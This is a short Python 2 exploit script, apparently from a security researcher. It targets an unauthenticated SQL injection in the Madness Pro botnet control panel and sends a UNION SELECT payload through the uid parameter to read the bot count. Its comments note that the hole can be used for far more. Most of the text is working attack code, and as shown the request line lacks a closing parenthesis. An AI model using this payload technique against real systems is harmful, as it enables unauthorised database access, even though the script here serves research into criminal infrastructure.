#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# Exploit Title: Madness Pro <= 1.14 SQL injection
# Date: June 05, 2014
# Exploit Author: @botnet_hunter
# Version: 1.14
# Tested on: Apache2 - Ubuntu - MySQL
# ▄▄▌ ▄▄▄▄· ▄▄▄▄▄ • ▌ ▄ ·. ▄· ▄▌
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# Unauthenticated SQL injection in Madness Pro panel <= 1.14
# Proof of Concept retrieves a count of the bots, although it can be utilized for far more
# Discovered and developed by bwall @botnet_hunter
# References:
# http://blog.cylance.com/a-study-in-bots-lobotomy
import urllib
# Fill in URL that Madness Pro bot connects back to
panel_url = ""
def run_sqli_proof_of_concept(panel_index_url):
f = urllib.urlopen("{0}?uid='%20OR%201=2%20UNION%20ALL%20SELECT%201,1,1,CONCAT('bot-count:',COUNT(*))%20FROM%20bots"
print f.read()